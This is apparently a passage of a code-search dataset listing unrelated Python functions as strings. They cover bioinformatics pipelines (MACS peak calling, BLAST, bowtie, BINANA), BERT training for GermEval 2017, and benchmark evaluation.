site.\n new_s = site_s - args.max_dist - 1\n new_e = site_e + args.max_dist + 1\n new_l = new_e - new_s\n id2len_dic[site_id] = new_l\n c_ol += 1\n # Store original region.\n id2stats_dic[site_id] = \"%s\\t%i\\t%i\\t%s\\t%s\\t%s\" %(seq_id,site_s,site_e,site_id,site_sc,site_pol)\n # Output extended region.\n TMPOUT.write(\"%s\\t%i\\t%i\\t%s\\t%s\\t%s\\n\" % (seq_id,new_s,new_e,site_id,site_sc,site_pol))\n f.close()\n TMPOUT.close()\n\n # Overlap sites with exons, get bases overlapping.\n cliplib.intersect_bed_files(tmp_bed3, tmp_bed1, \"-s\", tmp_bed4)\n\n # Output .bed.\n OUT = open(args.out_bed,\"w\")\n seen_dic = {}\n # Number of sites close to exon ends.\n c_close = 0\n\n # Get sites within border range.\n with open(tmp_bed4) as f:\n for line in f:\n cols = line.strip().split(\"\\t\")\n site_s = int(cols[1])\n site_e = int(cols[2])\n site_id = cols[3]\n if site_id in seen_dic:\n continue\n site_l = site_e - site_s\n full_l = id2len_dic[site_id]\n bed_row = id2stats_dic[site_id]\n if not full_l == site_l:\n c_close += 1\n OUT.write(\"%s\\n\" %(bed_row))\n seen_dic[site_id] = 1\n\n clean_up = True\n if clean_up:\n # Remove tmp files.\n if os.path.exists(tmp_bed1):\n os.remove(tmp_bed1)\n if os.path.exists(tmp_bed2):\n os.remove(tmp_bed2)\n if os.path.exists(tmp_bed3):\n os.remove(tmp_bed3)\n if os.path.exists(tmp_bed4):\n os.remove(tmp_bed4)\n\n # Report results.\n print(\"exb output stats (post-filtering)\")\n print(\"=================================\")\n print(\"Number of --in 
regions: %i\" %(c_in))\n print(\"Number of --in regions overlapping with exon regions: %i\" %(c_ol))\n print(\"Number of --in regions close to exon ends: %i\" %(c_close))\n print(\"Regions close to exon ends written to:\\n%s\\n\" %(args.out_bed))", "def main(args):\n\n # Compose the model list\n modellist = []\n if args['model']:\n modellist.append(bmark.ModelInfo(args['model'], os.getcwd(), args['classname']))\n\n # Load the benchmark settings\n benchmark = None\n benchmark = bmark.load_benchmark(args['benchmark'])\n corresponding_data = False\n if 'corresponding_data' in benchmark:\n corresponding_data = benchmark['corresponding_data']\n\n # Only extend if not cached\n cache_df = None\n if not args['cache']:\n modellist.extend(benchmark['models'])\n else:\n cache_df = pd.read_csv(args['cache'])\n\n # Extract comparator settings from benchmark description\n eval_comparator = comparator.EqualityComparator()\n if 'comparator' in benchmark:\n if benchmark['comparator'] == 'nvc':\n eval_comparator = comparator.NVCComparator()\n\n # Run the model evaluation\n is_silent = (args['output'] in ['html', 'server'])\n eva = None\n if benchmark['type'] == 'adaption':\n eva = evaluator.AdaptionEvaluator(\n modellist,\n eval_comparator,\n benchmark['data.test'],\n train_datafile=benchmark['data.train'],\n train_data_person=benchmark['data.train_person'],\n silent=is_silent,\n corresponding_data=corresponding_data,\n domain_encoders=benchmark['domain_encoders'],\n cache_df=cache_df\n )\n elif benchmark['type'] == 'coverage':\n # Check for benchmark validity\n if benchmark['data.train'] or benchmark['data.train_person']:\n print('WARNING: Ignoring specified training and train_person data ' \\\n + 'for coverage evaluation...')\n\n eva = evaluator.CoverageEvaluator(\n modellist,\n eval_comparator,\n benchmark['data.test'],\n train_datafile=benchmark['data.train'],\n train_data_person=benchmark['data.train_person'],\n silent=is_silent,\n corresponding_data=corresponding_data,\n domain_encoders=benchmark['domain_encoders'],\n cache_df=cache_df\n )\n else:\n raise ValueError('Unknown benchmark type: {}'.format(benchmark['type']))\n\n with silence_stdout(is_silent):\n res_df = eva.evaluate()\n\n if 'save' in args:\n res_df.to_csv(args['save'], index=False)\n\n # Run the metric visualizer\n htmlcrtr = html_creator.HTMLCreator([\n viz_plot.AccuracyVisualizer(),\n viz_plot.BoxplotVisualizer(),\n viz_plot.TableVisualizer()\n ])\n\n # Prepare the benchmark output information and visualize the evaluation results\n benchmark_info = {\n 'name': os.path.basename(args['benchmark']),\n 'data.train': os.path.basename(\n benchmark['data.train']) if benchmark['data.train'] else '',\n 'data.train_person': os.path.basename(\n benchmark['data.train_person']) if benchmark['data.train_person'] else '',\n 'data.test': os.path.basename(benchmark['data.test']),\n 'type': benchmark['type'],\n 'corresponding_data': benchmark['corresponding_data'],\n 'domains': list(res_df['domain'].unique()),\n 'response_types': list(res_df['response_type'].unique()),\n }\n\n if args['output'] == 'browser':\n html = htmlcrtr.to_html(res_df, benchmark_info, embedded=False)\n server.load_in_default_browser(html.encode('utf8'))\n elif args['output'] == 'server':\n html = htmlcrtr.to_html(res_df, benchmark_info, embedded=True)\n sys.stdout.buffer.write(html.encode('utf-8'))\n elif args['output'] == 'html':\n html = htmlcrtr.to_html(res_df, benchmark_info, embedded=False)\n print(html)", "def analyze_run():\n file_datas_dict = load_datas(Args.data_files)\n 
plotables_dict = dict()\n for file_name, datas in file_datas_dict.viewitems():\n analized_datas = analyze_datas(datas,Args.analysis_attributes)\n plotables = ana_results_to_plotables(\n analized_datas,\n Args.analysis_attributes\n )\n if Args.dm_file_out:\n analysis_save_dm(\n analized_datas,\n plotables,\n Args.analysis_attributes,\n Args.dm_file_out\n )\n if Args.mat_file_out:\n analysis_save(\n plotables,\n Args.analysis_attributes,\n Args.mat_file_out\n )\n if Args.verbose:\n plotables_dict[file_name] = plotables\n if Args.verbose:\n ana_plot_figures(plotables_dict,Args.analysis_attributes)", "def main():\r\n parser = get_parser()\r\n config = parser.parse_args(['--cfg', 'config.yaml'])\r\n result_filing.init_config_vars(config)\r\n run_id = config.info.run_id\r\n logger = custom_logger.CustomLogger(run_id+':'+file_id)\r\n\r\n operation = config.info.operation_type\r\n logger.info(\"Selected operation type %s.\"%(operation))\r\n if operation == const.TRAIN_OP:\r\n train.train_model(config)\r\n elif operation == const.DEPLOY_OP:\r\n test.test_model(config)", "def main():\n\n ############################ variable settings #################################\n parser = argparse.ArgumentParser(description='Run Subtask C of GermEval 2017 Using Pre-Trained Language Model.')\n parser.add_argument('--seed', type=int, default=42, help='Random seed.')\n parser.add_argument('--lang_model', type=str, default='bert-base-german-dbmdz-uncased', help='The pre-trained language model.')\n parser.add_argument('--epochs', type=int, default=4, help='Number of epochs for training.')\n parser.add_argument('--lr', type=float, default=5e-5, help='The learning rate.')\n parser.add_argument('--max_len', type=int, default=256, help='The maximum sequence length of the input text.')\n parser.add_argument('--batch_size', type=int, default=32, help='Your train set batch size.')\n parser.add_argument('--df_path', type=str, default='./data/', help='The data directory.') \n parser.add_argument('--train_data', type=str, default='train_df_cat.tsv', help='The filename of the input train data.')\n parser.add_argument('--dev_data', type=str, default='dev_df_cat.tsv', help='The filename of the input development data.')\n parser.add_argument('--test_data1', type=str, default='test_syn_df_cat.tsv', help='The filename of the first input test data (synchronic).')\n parser.add_argument('--test_data2', type=str, default='test_dia_df_cat.tsv', help='The filename of the second input test data (diachronic).')\n parser.add_argument('--output_path', type=str, default='./output/subtaskC/', help='The output directory of the model and predictions.')\n parser.add_argument(\"--train\", default=True, action=\"store_true\", help=\"Flag for training.\")\n parser.add_argument(\"--save_prediction\", default=False, action=\"store_true\", help=\"Flag for saving predictions.\")\n parser.add_argument(\"--save_cr\", default=False, action=\"store_true\", help=\"Flag for saving confusion matrix.\")\n parser.add_argument(\"--exclude_general\", default=False, action=\"store_true\", help=\"Flag for excluding category Allgemein.\")\n parser.add_argument(\"--exclude_neutral\", default=False, action=\"store_true\", help=\"Flag for excluding neutral polarity.\")\n parser.add_argument(\"--exclude_general_neutral\", default=False, action=\"store_true\", help=\"Flag for excluding category Allgemein:neutral.\")\n args = parser.parse_args()\n ################################################################################\n set_all_seeds(args.seed)\n device, n_gpu = 
initialize_device_settings(use_cuda=True)\n \n # Load data\n train_df = pd.read_csv(args.df_path + args.train_data, delimiter = '\\t')\n dev_df = pd.read_csv(args.df_path + args.dev_data, delimiter = '\\t')\n test_syn_df = pd.read_csv(args.df_path + args.test_data1, delimiter = '\\t')\n test_dia_df = pd.read_csv(args.df_path + args.test_data2, delimiter = '\\t')\n \n # Create a tokenizer\n lower_case = False\n if args.lang_model[-7:] == \"uncased\":\n lower_case = True\n\n if args.lang_model[:4] == \"bert\":\n model_class = \"BERT\"\n tokenizer = BertTokenizer.from_pretrained(args.lang_model, do_lower_case=lower_case, max_length=args.max_len)\n \n if args.lang_model[:10] == \"distilbert\":\n model_class = \"DistilBERT\"\n tokenizer = DistilBertTokenizer.from_pretrained(args.lang_model, do_lower_case=lower_case, max_length=args.max_len)\n \n\n # get training features\n cats = train_df.columns[5:]\n end = \"full\"\n # exclude categories if required\n if (args.exclude_general):\n cats = [i for i in list(cats) if \"Allgemein\" not in i]\n end = \"excl_gen\"\n if (args.exclude_neutral):\n cats = [i for i in list(cats) if \"neutral\" not in i]\n end = \"excl_neu\"\n if (args.exclude_general_neutral):\n cats = [i for i in list(cats) if \"Allgemein:neutral\" not in i]\n end = \"excl_genneu\"\n \n num_labels = len(list(cats))\n\n # create one hot labels\n train_df['one_hot_labels'] = list(train_df[list(cats)].values)\n dev_df['one_hot_labels'] = list(dev_df[list(cats)].values)\n test_syn_df['one_hot_labels'] = list(test_syn_df[list(cats)].values)\n test_dia_df['one_hot_labels'] = list(test_dia_df[list(cats)].values)\n\n # retrieve sentences and labels\n df = pd.concat([train_df, dev_df])\n sentences = df.text.values\n labels = list(df.one_hot_labels.values) \n\n sentences_syn = test_syn_df.text.values\n labels_syn = list(test_syn_df.one_hot_labels.values)\n\n sentences_dia = test_dia_df.text.values\n labels_dia = list(test_dia_df.one_hot_labels.values)\n \n print(\"number of categories:\", len(list(cats)))\n\n # Tokenize all of the sentences and map the tokens to their word IDs. 
\n input_ids = [tokenizer.encode(sent, add_special_tokens=True, truncation=True, \n max_length=args.max_len) for sent in sentences]\n input_ids = pad_sequences(input_ids, maxlen=args.max_len, dtype=\"long\", \n value=0.0, truncating=\"post\", padding=\"post\")\n # Create attention masks\n attention_masks = [[int(token_id > 0) for token_id in sent] for sent in input_ids]\n \n # synchronic test data\n input_ids_syn = [tokenizer.encode(sent, add_special_tokens=True, truncation=True) for sent in sentences_syn]\n input_ids_syn = pad_sequences(input_ids_syn, maxlen=args.max_len, dtype=\"long\", \n value=0.0, truncating=\"post\", padding=\"post\")\n attention_masks_syn = [[int(token_id > 0) for token_id in sent] for sent in input_ids_syn]\n \n # diachronic test data\n input_ids_dia = [tokenizer.encode(sent, add_special_tokens=True, truncation=True) for sent in sentences_dia]\n input_ids_dia = pad_sequences(input_ids_dia, maxlen=args.max_len, dtype=\"long\", \n value=0.0, truncating=\"post\", padding=\"post\")\n attention_masks_dia = [[int(token_id > 0) for token_id in sent] for sent in input_ids_dia]\n\n # split train, dev\n train_inputs, train_labels, dev_inputs, dev_labels, train_masks, dev_masks = split_train_dev(\n train_df, dev_df, attention_masks, input_ids, labels)\n \n # transform to torch tensor\n train_inputs = torch.tensor(train_inputs)\n dev_inputs = torch.tensor(dev_inputs)\n\n train_labels = torch.tensor(train_labels)\n dev_labels = torch.tensor(dev_labels)\n\n train_masks = torch.tensor(train_masks)\n dev_masks = torch.tensor(dev_masks)\n\n test_syn_inputs = torch.tensor(input_ids_syn)\n test_syn_masks = torch.tensor(attention_masks_syn)\n test_syn_labels = torch.tensor(labels_syn)\n\n test_dia_inputs = torch.tensor(input_ids_dia)\n test_dia_masks = torch.tensor(attention_masks_dia)\n test_dia_labels = torch.tensor(labels_dia)\n\n # Create the DataLoader\n train_dataloader = create_dataloader(train_inputs, train_masks, \n train_labels, args.batch_size, train = True)\n\n dev_dataloader = create_dataloader(dev_inputs, dev_masks, \n dev_labels, args.batch_size, train = False)\n\n test_syn_dataloader = create_dataloader(test_syn_inputs, test_syn_masks, \n test_syn_labels, args.batch_size, \n train = False)\n\n test_dia_dataloader = create_dataloader(test_dia_inputs, test_dia_masks, \n test_dia_labels, args.batch_size, \n train = False)\n\n # Create model\n if args.train:\n if model_class == \"BERT\":\n config = BertConfig.from_pretrained(args.lang_model, num_labels=num_labels) \n config.hidden_dropout_prob = 0.1 \n model = BertForSequenceClassification.from_pretrained(\n args.lang_model,\n num_labels = num_labels,\n output_attentions = False,\n output_hidden_states = False\n )\n\n if model_class == \"DistilBERT\":\n config = DistilBertConfig.from_pretrained(args.lang_model, num_labels=num_labels) \n config.hidden_dropout_prob = 0.1 \n model = DistilBertForSequenceClassification.from_pretrained(\n args.lang_model,\n num_labels = num_labels,\n output_attentions = False,\n output_hidden_states = False\n )\n model.cuda()\n\n\n # Create an optimizer\n param_optimizer = list(model.named_parameters())\n no_decay = ['bias', 'LayerNorm.weight']\n optimizer_grouped_parameters = [\n {'params': [p for n, p in param_optimizer if not any(nd in n for nd in no_decay)],\n 'weight_decay_rate': 0.01},\n {'params': [p for n, p in param_optimizer if any(nd in n for nd in no_decay)],\n 'weight_decay_rate': 0.0}\n ]\n optimizer = AdamW(\n optimizer_grouped_parameters,\n lr=args.lr,\n eps = 1e-8\n )\n # Total 
number of training steps = number of batches * number of epochs\n total_steps = len(train_dataloader) * args.epochs\n # Create the learning rate scheduler\n scheduler = get_linear_schedule_with_warmup(\n optimizer,\n num_warmup_steps=0,\n num_training_steps=total_steps\n )\n \n # train model\n # Main Loop\n print(\"=================== Train ================\")\n print(\"##### Language Model:\", args.lang_model, \",\", \"learning rate:\", args.lr)\n print()\n\n track_time = time.time()\n # trange is a tqdm wrapper around the normal python range\n for epoch in trange(args.epochs, desc=\"Epoch\"):\n print(\"Epoch: %4i\"%epoch, dt.datetime.now())\n\n model, optimizer, scheduler, tr_loss = train_multilabel(\n train_dataloader=train_dataloader, \n model=model, \n device=device, \n optimizer=optimizer, \n scheduler=scheduler, \n num_labels=num_labels\n )\n # EVALUATION: TRAIN SET\n pred_bools_train, true_bools_train, f1_train = eval_multilabel(\n train_dataloader, model=model, device=device)\n print(\"TRAIN: micro F1 %.3f\"%(f1_train))\n \n # EVALUATION: DEV SET\n pred_bools_dev, true_bools_dev, f1_dev = eval_multilabel(\n dev_dataloader, model=model, device=device)\n print(\"EVAL: micro F1 %.3f\"%(f1_dev))\n \n\n print(\" Training and validation took in total: {:}\".format(format_time(time.time()-track_time)))\n\n # EVALUATION: TEST SYN SET\n pred_bools_syn, true_bools_syn, f1_test_syn = eval_multilabel(\n test_syn_dataloader, model=model, device=device)\n print(\"TEST SYN: micro F1 %.4f\"%(f1_test_syn))\n\n # classification report\n clf_report_syn = classification_report(true_bools_syn, pred_bools_syn, target_names=cats, digits=3)\n print(clf_report_syn)\n\n\n # EVALUATION: TEST DIA SET\n pred_bools_dia, true_bools_dia, f1_test_dia = eval_multilabel(\n test_dia_dataloader, model=model, device=device\n )\n print(\"TEST DIA: micro F1 %.4f\"%(f1_test_dia))\n\n # classification report\n clf_report_dia = classification_report(true_bools_dia, pred_bools_dia, target_names=cats, digits=3)\n print(clf_report_dia)\n \n if args.save_cr:\n pickle.dump(clf_report_syn, open(args.output_path+'clf_report_'+args.lang_model+'_test_syn_'+str(num_labels)+end+'.txt','wb'))\n pickle.dump(clf_report_dia, open(args.output_path+'clf_report_'+args.lang_model+'_test_dia_'+str(num_labels)+end+'.txt','wb'))\n\n\n if args.save_prediction:\n test_syn_df[\"category_pred\"] = pred_bools_syn\n test_dia_df[\"category_pred\"] = pred_bools_dia\n test_syn_df.category_pred.to_csv(args.output_path+args.lang_model+'_test_syn_'+str(num_labels)+end+\".tsv\", \n sep=\"\\t\", index = False, header = True, encoding = \"utf-8-sig\")\n test_dia_df.category_pred.to_csv(args.output_path+args.lang_model+'_test_dia_'+str(num_labels)+end+\".tsv\", \n sep=\"\\t\", index = False, header = True, encoding = \"utf-8-sig\")", "def analyse(self):\n pass", "def main():\n count = 0\n\n # Read in the required files and filenames.\n predicted_proteins, protein_db, output_file_aug_to_fasta, \\\n output_file_proteins_to_db, blastp_output, output_to_file, \\\n overwrite = call_files()\n\n # Write all entries in the AUGUSTUS output to a FASTA file\n for record in split_records_aug(predicted_proteins):\n if count == 0:\n mode = 'w'\n else:\n mode = 'a'\n write_fasta(record, output_file_aug_to_fasta, mode)\n count += 1\n\n # Create a blast database and carry out a blastp search\n blast_db = blast_database(protein_db, 'prot', True,\n output_file_proteins_to_db, overwrite)\n\n blastp_file = blastp(output_file_proteins_to_db, output_file_aug_to_fasta,\n True, 
blastp_output, overwrite, 7)\n\n # Parse the blastp results for the desired information\n blast_results = parse_blastp_output(blastp_output)\n\n # Print the results\n print_output(blast_results)", "def run_annotation(args):\n #print(\"running chronqc_annotation\")\n chronqc_annotation.main(args)", "def main():\n\n # add basic arguments\n parser = argparse.ArgumentParser()\n # path to executable\n parser.add_argument(\"bowtie_path\", type=str, help=\"path/to/bowtie_executable/\")\n # select path to output directory, otherwise default location is input dir\n parser.add_argument(\"index_output_fq\", type=str, help=\"/path/to/output_index_directory/\" )\n parser.add_argument(\"output_sam\", type=str, help=\"path/to/output/sam_file\")\n\n # select either paired end or single end\n parser.add_argument(\"-1\", \"--pe1\", nargs='*', help=\"comma seperated list of forward pair fastq files\")\n parser.add_argument(\"-2\", \"--pe2\", nargs='*', help=\"comma seperated list of reverse pair fastq files\")\n parser.add_argument(\"-u\", \"--unpaired\", nargs='*', help=\"comma sperated list of unpaired fastq files\")\n\n parser.add_argument(\"-c\", \"--contigs\", nargs='+', required=True, help=\"comma seperated list of contig fasta files\")\n\n # option to have log files\n parser.add_argument(\"-l\", \"--log\", type=str, help=\"/path/to/log_file\")\n\n args = parser.parse_args()\n\n # if a log file is specified, use it\n if args.log is not None:\n print(\"there exists an output log\")\n log_file = args.log\n # begin program, set up logger\n logging.basicConfig(filename=log_file, level=logging.INFO)\n logging.debug('begin main')\n\n # sanity check\n logging.info('The bowtie executable file path is: {0}'.format(args.bowtie_path))\n\n if args.pe1:\n logging.info('The pe1 fastq files processed by bowtie are: {0}'.format(args.pe1))\n if args.pe2:\n logging.info('The pe2 fastq files processed by bowtie are: {0}'.format(args.pe2))\n if args.pe12:\n logging.info('The unpaired fastq files processed by bowtie are: {0}'.format(args.unpaired))\n if args.se:\n logging.info('The fasta files processed by bowtie-build are: {0}'.format(args.contigs))\n\n logging.info('The bowtie index directory is: {0}'.format(args.index_output_fq))\n logging.info('The bowtie output SAM file is: {0}'.format(args.output_sam))\n\n # call the megahit subprocess\n print(build_run_bowtie(args.bowtie_path, args.contigs, args.index_output_fq, args.pe1, args.pe2, args.unpaired,\n args.output_sam))", "def run_analysis(self):\n\n self._apply_loads_to_framat_model()\n\n # ----- Run the FramAT analysis -----\n results = standard_run(args=StdRunArgs(filename=self.own_files['model_file'], verbose=True))\n self.last_solution = results\n\n # ----- Share loads -----\n logger.info(\"Sharing loads...\")\n frame = results['frame']\n self.shared.structure.def_fields = frame.deformation.get_displacement_fields(frame, n_sup=1000)", "def run_blast(inputfile, input_type, outputfile, database, args=None, verbose=True):\n\n assert (input_type in ['protein', 'dna']), \"Input type must be either 'protein' or 'dna'\"\n\n cmd = ['diamond']\n\n if input_type == 'protein':\n cmd += ['blastp']\n elif input_type == 'dna':\n cmd += ['blastx']\n\n cmd += ['-d', database]\n cmd += ['-q', inputfile]\n cmd += ['-o', outputfile]\n\n if not args:\n args = \"--more-sensitive --top 10 --quiet\"\n\n cmd += args.split()\n\n if verbose:\n print(' '.join(cmd))\n\n with open(os.devnull, 'w') as devnull:\n try:\n exit_code = call(cmd, stdout=devnull)\n except OSError:\n exit_code = 
None\n\n return exit_code", "def call_binana(self, autodock_path, autodock_path_2):\n import process_binana\n autodock_chain_A = \"$MGL/pythonsh $ADT/prepare_receptor4.py -r \" + self.complex_name_A \\\n + \" -A hydrogens -o output/\" + self.complex_name + \"_\" + self.chains[0] + \".pdbqt\\n\"\n autodock_chain_B = \"$MGL/pythonsh $ADT/prepare_receptor4.py -r \" + self.complex_name_B \\\n + \" -A hydrogens -o output/\" + self.complex_name + \"_\" + self.chains[1] + \".pdbqt\\n\"\n self.write_binana_sh(autodock_path, autodock_path_2, autodock_chain_A, autodock_chain_B)\n os.system(\"sh pdbqt_generator.sh\")\n binana_output = \"binana_\" + self.pdb_path\n binana_command = \"python services/binana_1_2_0.py -receptor output/\" + self.pdb_name \\\n + \"_complex_\" + self.chains[0] + \".pdbqt -ligand output/\" \\\n + self.pdb_name + \"_complex_\" + self.chains[1] + \".pdbqt -output_file \" + binana_output\n os.system(binana_command)\n binana_output = process_binana.retrieve_features(binana_output)\n return binana_output", "def main(argv: Sequence[Text]) -> None:\n\n\n print(\"TODO\")", "def _send_analysis(self, analysis_name):", "def main():\n boba_blast_game.main()", "def run( args ):\n # Parse options...\n options = opt_validate_callpeak( args )\n # end of parsing commandline options\n info = options.info\n warn = options.warn\n debug = options.debug\n error = options.error\n \n #0 output arguments\n info(\"\\n\"+options.argtxt)\n options.PE_MODE = options.format in ('BAMPE','BEDPE')\n if options.PE_MODE:\n tag = 'fragment' # call things fragments not tags\n else:\n tag = 'tag'\n\n tempfile.tempdir = options.tempdir\n\n #1 Read tag files\n info(\"#1 read %s files...\", tag)\n if options.PE_MODE:\n (treat, control) = load_frag_files_options (options)\n else:\n (treat, control) = load_tag_files_options (options)\n if control is not None:\n # check if chromosome names are consistent. 
quit if not.\n check_names(treat, control, error)\n\n info(\"#1 %s size = %.1f\", tag, options.tsize)\n tagsinfo = \"# %s size is determined as %d bps\\n\" % (tag, options.tsize)\n\n t0 = treat.total\n tagsinfo += \"# total %ss in treatment: %d\\n\" % (tag, t0)\n info(\"#1 total %ss in treatment: %d\", tag, t0)\n\n # handle duplicates\n if options.keepduplicates != \"all\":\n if options.keepduplicates == \"auto\":\n info(\"#1 calculate max duplicate %ss in single position based on binomial distribution...\", tag)\n treatment_max_dup_tags = cal_max_dup_tags(options.gsize,t0)\n info(\"#1 max_dup_tags based on binomial = %d\" % (treatment_max_dup_tags))\n else:\n info(\"#1 user defined the maximum %ss...\", tag)\n treatment_max_dup_tags = int(options.keepduplicates)\n if options.PE_MODE:\n info(\"#1 filter out redundant fragments by allowing at most %d identical fragment(s)\", treatment_max_dup_tags)\n else:\n info(\"#1 filter out redundant tags at the same location and the same strand by allowing at most %d tag(s)\", treatment_max_dup_tags)\n\n treat.filter_dup(treatment_max_dup_tags)\n t1 = treat.total\n info(\"#1 %ss after filtering in treatment: %d\", tag, t1)\n tagsinfo += \"# %ss after filtering in treatment: %d\\n\" % (tag, t1)\n if options.PE_MODE:\n tagsinfo += \"# maximum duplicate fragments in treatment = %d\\n\" % (treatment_max_dup_tags)\n else:\n tagsinfo += \"# maximum duplicate tags at the same position in treatment = %d\\n\" % (treatment_max_dup_tags)\n info(\"#1 Redundant rate of treatment: %.2f\", float(t0 - t1) / t0)\n tagsinfo += \"# Redundant rate in treatment: %.2f\\n\" % (float(t0-t1)/t0)\n else:\n t1 = t0\n\n if control is not None:\n c0 = control.total\n tagsinfo += \"# total %ss in control: %d\\n\" % (tag, c0)\n info(\"#1 total %ss in control: %d\", tag, c0)\n\n if options.keepduplicates != \"all\":\n if options.keepduplicates == \"auto\":\n info(\"#1 for control, calculate max duplicate %ss in single position based on binomial distribution...\", tag)\n control_max_dup_tags = cal_max_dup_tags(options.gsize,c0)\n info(\"#1 max_dup_tags based on binomial = %d\" % (control_max_dup_tags))\n else:\n info(\"#1 user defined the maximum %ss...\", tag)\n control_max_dup_tags = int(options.keepduplicates)\n if options.PE_MODE:\n info(\"#1 filter out redundant fragments by allowing at most %d identical fragment(s)\", treatment_max_dup_tags)\n else:\n info(\"#1 filter out redundant tags at the same location and the same strand by allowing at most %d tag(s)\", treatment_max_dup_tags)\n control.filter_dup(treatment_max_dup_tags)\n #control.separate_dups(treatment_max_dup_tags) # changed 5-29; changed back since we don't need to call addbackdup+refinepeak anymore\n c1 = control.total\n\n info(\"#1 %ss after filtering in control: %d\", tag, c1)\n tagsinfo += \"# %ss after filtering in control: %d\\n\" % (tag, c1)\n if options.PE_MODE:\n tagsinfo += \"# maximum duplicate fragments in control = %d\\n\" % (treatment_max_dup_tags)\n else:\n tagsinfo += \"# maximum duplicate tags at the same position in control = %d\\n\" % (treatment_max_dup_tags)\n\n info(\"#1 Redundant rate of control: %.2f\" % (float(c0-c1)/c0))\n tagsinfo += \"# Redundant rate in control: %.2f\\n\" % (float(c0-c1)/c0)\n else:\n c1 = c0\n info(\"#1 finished!\")\n\n #2 Build Model\n info(\"#2 Build Peak Model...\")\n\n if options.nomodel:\n info(\"#2 Skipped...\")\n if options.PE_MODE:\n options.d = options.tsize\n else:\n options.d=options.extsize\n info(\"#2 Use %d as fragment length\" % (options.d))\n if 
options.shift > 0:\n info(\"#2 Sequencing ends will be shifted towards 3' by %d bp(s)\" % (options.shift))\n elif options.shift < 0:\n info(\"#2 Sequencing ends will be shifted towards 5' by %d bp(s)\" % (options.shift * -1))\n options.scanwindow=2*options.d # remove the effect of --bw\n else:\n peakmodel = PeakModel(treatment = treat,\n max_pairnum = MAX_PAIRNUM,\n opt = options\n )\n try:\n peakmodel.build()\n info(\"#2 finished!\")\n debug(\"#2 Summary Model:\")\n debug(\"#2 min_tags: %d\" % (peakmodel.min_tags))\n debug(\"#2 d: %d\" % (peakmodel.d))\n debug(\"#2 scan_window: %d\" % (peakmodel.scan_window))\n info(\"#2 predicted fragment length is %d bps\" % peakmodel.d)\n info(\"#2 alternative fragment length(s) may be %s bps\" % ','.join(map(str,peakmodel.alternative_d)))\n info(\"#2.2 Generate R script for model : %s\" % (options.modelR))\n model2r_script(peakmodel,options.modelR,options.name)\n options.d = peakmodel.d\n options.scanwindow= 2*options.d\n if options.d <= 2*options.tsize:\n warn(\"#2 Since the d (%.0f) calculated from paired-peaks are smaller than 2*tag length, it may be influenced by unknown sequencing problem!\" % (options.d))\n if options.onauto:\n options.d=options.extsize\n options.scanwindow=2*options.d\n warn(\"#2 MACS will use %d as EXTSIZE/fragment length d. NOTE: if the d calculated is still acceptable, please do not use --fix-bimodal option!\" % (options.d))\n else:\n warn(\"#2 You may need to consider one of the other alternative d(s): %s\" % ','.join(map(str,peakmodel.alternative_d)))\n warn(\"#2 You can restart the process with --nomodel --extsize XXX with your choice or an arbitrary number. Nontheless, MACS will continute computing.\")\n\n except NotEnoughPairsException:\n if not options.onauto:\n sys.exit(1)\n warn(\"#2 Skipped...\")\n options.d=options.extsize\n options.scanwindow=2*options.d\n warn(\"#2 Since --fix-bimodal is set, MACS will use %d as fragment length\" % (options.d))\n\n #3 Call Peaks\n info(\"#3 Call peaks...\")\n if options.nolambda:\n info(\"# local lambda is disabled!\")\n\n if control and options.PE_MODE:\n c1 = c1 * 2 # in PE_MODE, PE data has to be doubled since both ends will be counted for calculating background noise.\n\n # decide the scaling to balance the depth between treatment and control\n if control:\n if options.downsample:\n # use random sampling to balance treatment and control\n info(\"#3 User prefers to use random sampling instead of linear scaling.\")\n if t1 > c1:\n info(\"#3 MACS is random sampling treatment %ss...\", tag)\n if options.seed < 0:\n warn(\"#3 Your results may not be reproducible due to the random sampling!\")\n else:\n info(\"#3 Random seed (%d) is used.\" % options.seed)\n treat.sample_num(c1, options.seed)\n info(\"#3 %d Tags from treatment are kept\", treat.total)\n elif c1 > t1:\n info(\"#3 MACS is random sampling control %ss...\", tag)\n if options.seed < 0:\n warn(\"#3 Your results may not be reproducible due to the random sampling!\")\n else:\n info(\"#3 Random seed (%d) is used.\" % options.seed)\n control.sample_num(t1, options.seed)\n info(\"#3 %d %ss from control are kept\", control.total, tag)\n # set options.tocontrol although it would;t matter now\n options.tocontrol = False\n else:\n if options.scaleto == \"large\":\n if t1 > c1:\n # treatment has more tags than control, since tolarge is\n # true, we will scale control to treatment.\n options.tocontrol = False\n else:\n # treatment has less tags than control, since tolarge is\n # true, we will scale treatment to control.\n 
options.tocontrol = True\n else:\n if t1 > c1:\n # treatment has more tags than control, since tolarge is\n # false, we will scale treatment to control.\n options.tocontrol = True\n else:\n # treatment has less tags than control, since tolarge is\n # false, we will scale control to treatment.\n options.tocontrol = False\n\n peakdetect = PeakDetect(treat = treat,\n control = control,\n opt = options\n )\n peakdetect.call_peaks()\n\n # filter out low FE peaks\n peakdetect.peaks.filter_fc( fc_low = options.fecutoff )\n\n #4 output\n #4.1 peaks in XLS\n info(\"#4 Write output xls file... %s\" % (options.peakxls))\n ofhd_xls = open( options.peakxls, \"w\" )\n ofhd_xls.write(\"# This file is generated by MACS version %s\\n\" % (MACS_VERSION))\n ofhd_xls.write(options.argtxt+\"\\n\")\n ofhd_xls.write(tagsinfo)\n if options.shift > 0:\n ofhd_xls.write(\"# Sequencing ends will be shifted towards 3' by %d bp(s)\\n\" % (options.shift))\n elif options.shift < 0:\n ofhd_xls.write(\"# Sequencing ends will be shifted towards 5' by %d bp(s)\\n\" % (options.shift * -1))\n\n ofhd_xls.write(\"# d = %d\\n\" % (options.d))\n try:\n ofhd_xls.write(\"# alternative fragment length(s) may be %s bps\\n\" % ','.join(map(str,peakmodel.alternative_d)))\n except:\n # when --nomodel is used, there is no peakmodel object. Simply skip this line.\n pass\n if options.nolambda:\n ofhd_xls.write(\"# local lambda is disabled!\\n\")\n # pass write method so we can print too, and include name\n peakdetect.peaks.write_to_xls(ofhd_xls, name = options.name.encode())\n ofhd_xls.close()\n\n #4.2 peaks in BED\n if options.log_pvalue != None:\n score_column = \"pscore\"\n elif options.log_qvalue != None:\n score_column = \"qscore\"\n #4.2 peaks in narrowPeak\n if not options.broad:\n info(\"#4 Write peak in narrowPeak format file... %s\" % (options.peakNarrowPeak))\n ofhd_bed = open( options.peakNarrowPeak, \"w\" )\n peakdetect.peaks.write_to_narrowPeak (ofhd_bed, name_prefix=b\"%s_peak_\", name=options.name.encode(), score_column=score_column, trackline=options.trackline )\n ofhd_bed.close()\n #4.2-2 summits in BED\n info(\"#4 Write summits bed file... %s\" % (options.summitbed))\n ofhd_summits = open( 